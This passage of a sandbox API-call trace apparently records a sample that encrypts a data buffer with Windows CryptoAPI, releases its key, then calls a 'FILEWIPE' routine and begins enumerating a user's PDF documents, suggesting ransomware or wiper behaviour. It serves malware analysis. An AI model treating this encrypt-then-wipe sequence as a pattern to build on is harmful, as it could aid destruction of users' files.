(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0034.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.719] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.719] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.719] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.719] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.720] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.720] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.720] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x796e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x7970) returned 1 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.720] CharLowerBuffW (in: lpsz="byte[31089]", cchLength=0xb | out: lpsz="byte[31089]") returned 0xb [0034.720] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.721] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.721] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96bc80*, pdwDataLen=0x6ae220*=0x796e, dwBufLen=0x7970 | out: pbData=0x96bc80*, pdwDataLen=0x6ae220*=0x7970) returned 1 [0034.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.721] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.722] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.722] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.722] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.722] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.724] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.724] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.724] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.725] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.725] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.726] CryptDestroyKey (hKey=0x7c2280) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.726] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.726] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.726] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.726] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.726] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.727] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.727] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.727] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.727] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.727] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.727] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0034.727] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.728] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.728] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.728] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.728] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.728] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.730] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.730] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.730] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.730] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, 